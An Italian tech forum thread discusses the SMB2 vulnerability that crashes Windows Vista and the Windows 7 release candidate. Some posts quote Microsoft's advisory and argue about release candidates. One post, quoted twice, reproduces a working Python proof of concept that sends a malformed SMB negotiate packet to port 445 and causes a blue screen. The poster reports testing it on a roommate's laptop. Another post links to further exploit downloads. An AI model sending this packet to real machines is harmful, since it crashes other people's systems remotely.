Windows 7, una falla ancor prima di salpare

[SuperSandro]

"il problema colpisce Window 7 Release candidate ma non la versione finale del sistema operativo che è stata completata nel corso del mese di Luglio."
...uhmm... morale: comprate la versione finale e rinunciate a quella semi-gratuita. (della serie "A pensar male si indovina" ).

[mjordan]

Quote:

Originariamente inviato da SuperSandro

"il problema colpisce Window 7 Release candidate ma non la versione finale del sistema operativo che è stata completata nel corso del mese di Luglio."
...uhmm... morale: comprate la versione finale e rinunciate a quella semi-gratuita. (della serie "A pensar male si indovina" ).

A tuo avviso quindi non è normale che in una release candidate ci siano bug che sono stati fixati nella versione che è diventata finale?
Spiegatemi questo ragionamento perchè a me certe congetture sono ignote, non ci arrivo.

[Collision]

Più che altro c'è gente che usa una RC come sistema operativo principale e non per fare test!

[mjordan]

Quote:

Originariamente inviato da Collision

Più che altro c'è gente che usa una RC come sistema operativo principale e non per fare test!

Volevo dirlo anche io ma mi sono limitato, perchè a simili commenti sarebbe meglio rimanere in silenzio.

[SuperSandro]

Quote:

Originariamente inviato da mjordan

A tuo avviso quindi non è normale che in una release candidate ci siano bug che sono stati fixati nella versione che è diventata finale?
Spiegatemi questo ragionamento perchè a me certe congetture sono ignote, non ci arrivo.

Diamine, ma non si può fare una battuta! Comunque, se io fossi il Sig. Microsoft, non mi darei tanto da fare per eliminare bug da versioni di "prova", soprattutto se costituiscono un pericolo pressoché remoto (lo dimostra il fatto che ci hanno messo un bel po' per scoprirlo).

Dal momento che, però, nella versione commercializzata il bug non c'è, vuol dire che l'hanno individuato e rimosso (dubito che sia scomparso per caso). Ciò che stupisce - quindi- è la mancata comunicazione della presenza del bug nella RC version.

Oppure non l'hanno comunicato perché su 7 l'hanno rimosso ma su Vista ci stanno ancora lavorando?

[robertogl]

Quote:

Originariamente inviato da SuperSandro

Diamine, ma non si può fare una battuta! Comunque, se io fossi il Sig. Microsoft, non mi darei tanto da fare per eliminare bug da versioni di "prova", soprattutto se costituiscono un pericolo pressoché remoto (lo dimostra il fatto che ci hanno messo un bel po' per scoprirlo).

Dal momento che, però, nella versione commercializzata il bug non c'è, vuol dire che l'hanno individuato e rimosso (dubito che sia scomparso per caso). Ciò che stupisce - quindi- è la mancata comunicazione della presenza del bug nella RC version.

Oppure non l'hanno comunicato perché su 7 l'hanno rimosso ma su Vista ci stanno ancora lavorando?

probabilmente hanno riscritto il servizio da vista a seven e facendolo il bug è scomparso,magari neanche lo sapevano

[SuperSandro]

Quote:

Originariamente inviato da robertogl

probabilmente hanno riscritto il servizio da vista a seven e facendolo il bug è scomparso,magari neanche lo sapevano

...della serie "Siamo tutti nelle mani del Signore".

[MiKeLezZ]

http://www.microsoft.com/technet/sec...ry/975497.mspx

[TexZK]

Ma nessuno ha notato l'unico (forse) post sensato di tutta la discussione?

Quote:

Originariamente inviato da Simock85

Ma avete dato un'occhiata allo script prima di dar fiato alle trombe?

Codice:

# SecurityReason Note :
# Tested on : Windows Vista SP2 full updated - US-en 
#
#!/usr/bin/python
# When SMB2.0 recieve a "&" char in the "Process Id High" header field it dies with a 
# PAGE_FAULT_IN_NONPAGED_AREA B.S.O.D

from socket import socket
from time import sleep

host = "IP_ADDR", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: --> :) normal operation should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00" 
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57" 
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61" 
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c" 
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c" 
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e" 
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()

lo script (in python) invia una pacchetto di negoziazione a SMB del pc attaccato, l'header della stringa "Process Id High" contiene il carattere "&". Il driver SRV2.SYS interpreta l'"&" come un memory fault (che fisicamente non avviene), e se risiede nella nonpaged pool ecco l'inevitabile BSOD.

La mia prova, attacco effettuato da macOs 10.6, macchine attaccate:
1-notebook del coinquilino con Vista Business SP2, ovviamente condivisione attiva (impostato su rete domestica in centro connessioni), BSOD PAGE_FAULT_IN_NONPAGED_AREA e riavvio.
2-mio notebook con 7 professional RTM (MSDNAA), l'invio del "buff" non sortisce effetto alcuno, non crasha nemmeno il driver SRV2.SYS, eppure arriva tutto a destinazione in quanto non arrivano errori dalla libreria socket.

Quindi sono vulnerabili solo Vista e Server2008 (?? o forse no); peraltro non è una vulnerabilità grave in quanto il crash avviene all'arrivo dell'header del pacchetto e non si riesce ad iniettare codice nel corpo.
Il driver interpreta l'& nell'header come un page fault e arriva BSOD (quindi non viene creato un page fault, come avviene con la saturazione della nonpaged pool, ma ne viene semplicemente simulato l'effetto), antipatico ma innocuo, risolto in 7 probabilmente spostando il driver SRV2 nella paged pool (dedotto dal fatto che, nei miei test, 7 risulta vulnerabile se il pagefile viene disattivato); chiaramente è sensato aspettarsi una pezza al driver stesso.

[Curtis]

Quote:

Originariamente inviato da MiKeLezZ

http://www.microsoft.com/technet/sec...ry/975497.mspx

Workarounds
Block TCP ports 139 and 445 at the firewall

These ports are used to initiate a connection with the affected component. Blocking TCP ports 139 and 445 at the firewall will help protect systems that are behind that firewall from attempts to exploit this vulnerability. Microsoft recommends that you block all unsolicited inbound communication from the Internet to help prevent attacks that may use other ports.


http://www.hwupgrade.it/forum/showpo...8&postcount=84

Quote:

Originariamente inviato da Collision

Più che altro c'è gente che usa una RC come sistema operativo principale e non per fare test!

http://www.hwupgrade.it/forum/showpo...4&postcount=81

[Curtis]

Quote:

Originariamente inviato da MiKeLezZ

http://www.microsoft.com/technet/sec...ry/975497.mspx

Executive Summary
Microsoft is investigating new public reports of a possible vulnerability in Microsoft Server Message Block (SMB) implementation. We are not aware of attacks that try to use the reported vulnerabilities or of customer impact at this time.
We are actively working with partners in our Microsoft Active Protections Program (MAPP) to provide information that they can use to provide broader protections to customers.

Upon completion of this investigation, Microsoft will take the appropriate action to help protect our customers. This may include providing a security update through our monthly release process or providing an out-of-cycle security update, depending on customer needs.



_____________________


Se dovesse venir scoperto che la vulnerabilita' viene exploitata in the wild Microsoft rilascera' subito la patch straordinaria correttiva sia per Vista che per Win7 RC ( la RTM di Win7 come si sa non e' affetta )

[MiKeLezZ]

Quote:

Originariamente inviato da Curtis

Executive Summary
Microsoft is investigating new public reports of a possible vulnerability in Microsoft Server Message Block (SMB) implementation. We are not aware of attacks that try to use the reported vulnerabilities or of customer impact at this time.
We are actively working with partners in our Microsoft Active Protections Program (MAPP) to provide information that they can use to provide broader protections to customers.

Upon completion of this investigation, Microsoft will take the appropriate action to help protect our customers. This may include providing a security update through our monthly release process or providing an out-of-cycle security update, depending on customer needs.



_____________________


Se dovesse venir scoperto che la vulnerabilita' viene exploitata in the wild Microsoft rilascera' subito la patch straordinaria correttiva sia per Vista che per Win7 RC ( la RTM di Win7 come si sa non e' affetta )

ah no?
non c'è nessun attacco eh....

http://!!OCIO!!g-laurent.blogspot.co...-protocol.html

http://!!OCIO!!rapidshare.com/files/...ukeV7.zip.html

http://!!OCIO!!rapidshare.com/files/...IONAL.rar.html

http://!!OCIO!!pastie.org/611098

http://!!OCIO!!pastie.org/610829

togliete !!OCIO!! ...

[Curtis]

Quote:

Originariamente inviato da MiKeLezZ

ah no?
non c'è nessun attacco eh....

http://!!OCIO!!g-laurent.blogspot.co...-protocol.html

http://!!OCIO!!rapidshare.com/files/...ukeV7.zip.html

http://!!OCIO!!rapidshare.com/files/...IONAL.rar.html

http://!!OCIO!!pastie.org/611098

http://!!OCIO!!pastie.org/610829

togliete !!OCIO!! ...

stai col router adls che ha il firewall hardware e l'attacco anche se in the wild ti fa un baffo

il problema e' solo per chi sta in rete col modem usb che come si sa espone direttamente la macchine su internet ed ha pure il firewall di Vista o WIn7 RC disabilitato o le porte Netbios aperte come eccezione

[tmviet]

IO uso solo windows xp però son sicuro che anche su altri SO se si continua a martellare cosi come lo si fà con windows i bachi si trovano

[danlo8600]

Come al solito il titolo dell'articolo crea il delirio, ma andando ad analizzare affondo la situazione risulta più che chiaro che il sistema operativo vulnerabile è windows vista, comunque leggendo lo script a me non sembra che ci siano grossi rischi per la sicurezza e comunque per essere esposti bisogna veramente essere degli idioti e disattivare di tutto e anche di più... E comunque anche nel caso peggiore dell'idiota di turno non c'è pericolo. Sarei stato curioso di leggere i commenti di questo http://www.geekissimo.com/2008/04/05/mac-os-x-hackerato-piu-velocemente-di-windows-e-linux/
ma penso che ben pochi lo abbiano saputo.

[mjordan]

Quote:

Originariamente inviato da SuperSandro

Diamine, ma non si può fare una battuta! Comunque, se io fossi il Sig. Microsoft, non mi darei tanto da fare per eliminare bug da versioni di "prova", soprattutto se costituiscono un pericolo pressoché remoto (lo dimostra il fatto che ci hanno messo un bel po' per scoprirlo).

Dal momento che, però, nella versione commercializzata il bug non c'è, vuol dire che l'hanno individuato e rimosso (dubito che sia scomparso per caso). Ciò che stupisce - quindi- è la mancata comunicazione della presenza del bug nella RC version.

Oppure non l'hanno comunicato perché su 7 l'hanno rimosso ma su Vista ci stanno ancora lavorando?

Ma chi ha detto che la comunicazione è mancata? Guarda che i bug di Windows non passano per HWUpgrade in forma di notizia in genere

[Rizlo+]

Quote:

Ma avete dato un'occhiata allo script prima di dar fiato alle trombe?

Codice:

# SecurityReason Note :
# Tested on : Windows Vista SP2 full updated - US-en
#
#!/usr/bin/python
# When SMB2.0 recieve a "&" char in the "Process Id High" header field it dies with a
# PAGE_FAULT_IN_NONPAGED_AREA B.S.O.D

from socket import socket
from time import sleep

host = "IP_ADDR", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: --> normal operation should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()

lo script (in python) invia una pacchetto di negoziazione a SMB del pc attaccato, l'header della stringa "Process Id High" contiene il carattere "&". Il driver SRV2.SYS interpreta l'"&" come un memory fault (che fisicamente non avviene), e se risiede nella nonpaged pool ecco l'inevitabile BSOD.

La mia prova, attacco effettuato da macOs 10.6, macchine attaccate:
1-notebook del coinquilino con Vista Business SP2, ovviamente condivisione attiva (impostato su rete domestica in centro connessioni), BSOD PAGE_FAULT_IN_NONPAGED_AREA e riavvio.
2-mio notebook con 7 professional RTM (MSDNAA), l'invio del "buff" non sortisce effetto alcuno, non crasha nemmeno il driver SRV2.SYS, eppure arriva tutto a destinazione in quanto non arrivano errori dalla libreria socket.

Quindi sono vulnerabili solo Vista e Server2008 (?? o forse no); peraltro non è una vulnerabilità grave in quanto il crash avviene all'arrivo dell'header del pacchetto e non si riesce ad iniettare codice nel corpo.
Il driver interpreta l'& nell'header come un page fault e arriva BSOD (quindi non viene creato un page fault, come avviene con la saturazione della nonpaged pool, ma ne viene semplicemente simulato l'effetto), antipatico ma innocuo, risolto in 7 probabilmente spostando il driver SRV2 nella paged pool (dedotto dal fatto che, nei miei test, 7 risulta vulnerabile se il pagefile viene disattivato); chiaramente è sensato aspettarsi una pezza al driver stesso.

Quotone!! Davvero il post più sensato!
Non mi sembra il caso di dar fiato alle trombe per una vulnerabilità come le tantissime scoperte ogni giorno in tutto il mondo dell'informatica, ed è da idioti sostenere che le vulnerabilità ci sono perchè è stato fatto poco testing e ve lo sta dicendo uno che sui suoi PC non ha più windows da circa 5 anni...

[_TeRmInEt_]

[tmviet]

Sicuramente passerò da xp a window 7 a meno che non cambi pc più performante allora voglio provare Ubuntu